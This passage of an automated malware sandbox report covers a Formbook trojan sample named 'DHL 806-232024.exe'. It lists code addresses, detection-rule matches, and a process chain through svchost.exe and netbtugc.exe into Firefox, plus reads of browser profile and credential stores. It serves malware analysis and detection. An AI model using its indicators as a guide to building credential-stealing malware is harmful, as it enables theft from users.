            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2D34C2_2_02F2D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF132D2_2_02FF132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF70E92_2_02FF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF0E02_2_02FFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEF0CC2_2_02FEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F470C02_2_02F470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B16B2_2_0300B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F4B1B02_2_02F4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2F1722_2_02F2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7516C2_2_02F7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF16CC2_2_02FF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF7B02_2_02FFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F314602_2_02F31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFF43F2_2_02FFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDD5B02_2_02FDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF75712_2_02FF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FEDAC62_2_02FEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDDAAC2_2_02FDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F85AA02_2_02F85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB3A6C2_2_02FB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFA492_2_02FFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7A462_2_02FF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB5BF02_2_02FB5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F7DBF92_2_02F7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FB802_2_02F5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFB762_2_02FFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F438E02_2_02F438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAD8002_2_02FAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F499502_2_02F49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5B9502_2_02F5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD59102_2_02FD5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F49EB02_2_02F49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFFB12_2_02FFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F41F922_2_02F41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFF092_2_02FFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFFCF22_2_02FFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB9C322_2_02FB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5FDC02_2_02F5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF7D732_2_02FF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF1D5A2_2_02FF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F43D402_2_02F43D40
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031BF3B73_2_031BF3B7
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031C5AB53_2_031C5AB5
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031C5AB73_2_031C5AB7
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031DC9973_2_031DC997
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031BF1973_2_031BF197
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031BF18E3_2_031BF18E
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeCode function: 3_2_031BD4373_2_031BD437
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379A3524_2_0379A352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037A03E64_2_037A03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036EE3F04_2_036EE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037802744_2_03780274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037602C04_2_037602C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037681584_2_03768158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036D01004_2_036D0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0377A1184_2_0377A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037981CC4_2_037981CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037A01AA4_2_037A01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037720004_2_03772000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E07704_2_036E0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037047504_2_03704750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036DC7C04_2_036DC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036FC6E04_2_036FC6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E05354_2_036E0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037A05914_2_037A0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037924464_2_03792446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0378E4F64_2_0378E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379AB404_2_0379AB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03796BD74_2_03796BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036DEA804_2_036DEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036F69624_2_036F6962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E29A04_2_036E29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037AA9A64_2_037AA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E28404_2_036E2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036EA8404_2_036EA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0370E8F04_2_0370E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036C68B84_2_036C68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03754F404_2_03754F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03700F304_2_03700F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03722F284_2_03722F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036ECFE04_2_036ECFE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036D2FC84_2_036D2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0375EFA04_2_0375EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E0E594_2_036E0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379EE264_2_0379EE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379EEDB4_2_0379EEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379CE934_2_0379CE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036F2E904_2_036F2E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0377CD1F4_2_0377CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036EAD004_2_036EAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036DADE04_2_036DADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036F8DBF4_2_036F8DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E0C004_2_036E0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036D0CF24_2_036D0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03780CB54_2_03780CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036CD34C4_2_036CD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379132D4_2_0379132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0372739A4_2_0372739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037812ED4_2_037812ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036FB2C04_2_036FB2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E52A04_2_036E52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037AB16B4_2_037AB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0371516C4_2_0371516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036CF1724_2_036CF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036EB1B04_2_036EB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037970E94_2_037970E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379F0E04_2_0379F0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E70C04_2_036E70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0378F0CC4_2_0378F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379F7B04_2_0379F7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037916CC4_2_037916CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037975714_2_03797571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0377D5B04_2_0377D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036D14604_2_036D1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379F43F4_2_0379F43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379FB764_2_0379FB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03755BF04_2_03755BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0371DBF94_2_0371DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036FFB804_2_036FFB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03753A6C4_2_03753A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379FA494_2_0379FA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03797A464_2_03797A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0378DAC64_2_0378DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03725AA04_2_03725AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0377DAAC4_2_0377DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E99504_2_036E9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036FB9504_2_036FB950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_037759104_2_03775910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0374D8004_2_0374D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E38E04_2_036E38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379FF094_2_0379FF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379FFB14_2_0379FFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E1F924_2_036E1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E9EB04_2_036E9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03797D734_2_03797D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03791D5A4_2_03791D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036E3D404_2_036E3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_036FFDC04_2_036FFDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_03759C324_2_03759C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0379FCF24_2_0379FCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DC15E04_2_02DC15E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DC30F04_2_02DC30F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DC30EE4_2_02DC30EE
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBC7D04_2_02DBC7D0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBC7C74_2_02DBC7C7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBAA704_2_02DBAA70
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DBC9F04_2_02DBC9F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_02DD9FD04_2_02DD9FD0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358A0AF4_2_0358A0AF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358B9D64_2_0358B9D6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358B8B44_2_0358B8B4
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358BD6C4_2_0358BD6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 4_2_0358ADD84_2_0358ADD8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 101 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 275 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03715130 appears 57 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0374EA12 appears 86 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 036CB970 appears 275 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 0375F290 appears 105 times
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: String function: 03727E54 appears 101 times
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: String function: 008D7F41 appears 35 times
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: String function: 008F0D27 appears 70 times
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: String function: 008F8B40 appears 42 times
            Source: DHL 806-232024.exe, 00000000.00000003.2061513410.00000000038B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 806-232024.exe
            Source: DHL 806-232024.exe, 00000000.00000003.2063495490.0000000003A5D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs DHL 806-232024.exe
            Source: DHL 806-232024.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.320000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.320000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2214041996.0000000000320000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4529624062.0000000002DB0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.4530493179.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4530474719.00000000034A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2215036751.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2214383859.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.4530432523.0000000003460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/7
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093A2D5 GetLastError,FormatMessageW,0_2_0093A2D5
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00928713 AdjustTokenPrivileges,CloseHandle,0_2_00928713
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_00928CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00928CC3
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0093B59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0093B59E
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_0094F121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_0094F121
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_009486D0 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_009486D0
            Source: C:\Users\user\Desktop\DHL 806-232024.exeCode function: 0_2_008D4FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008D4FE9
            Source: C:\Users\user\Desktop\DHL 806-232024.exeFile created: C:\Users\user\AppData\Local\Temp\aut87C5.tmpJump to behavior
            Source: DHL 806-232024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: netbtugc.exe, 00000004.00000002.4529839998.0000000003292000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4529839998.00000000032BE000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2395534024.0000000003292000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000003.2395417337.0000000003271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: DHL 806-232024.exeVirustotal: Detection: 29%
            Source: DHL 806-232024.exeReversingLabs: Detection: 44%
            Source: unknownProcess created: C:\Users\user\Desktop\DHL 806-232024.exe "C:\Users\user\Desktop\DHL 806-232024.exe"
            Source: C:\Users\user\Desktop\DHL 806-232024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 806-232024.exe"
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\DHL 806-232024.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DHL 806-232024.exe"Jump to behavior
            Source: C:\Program Files (x86)\TGNzApqmSEjpYXfJzSzTOOnEpbWFhWCZqxokcOwcRxkvOrEVWZliQBBrT\yAEEhNGBaPExAdMu.exeProcess created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\DHL 806-232024.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\netbtugc.exeSection loaded: wintypes.dllJump to behavior
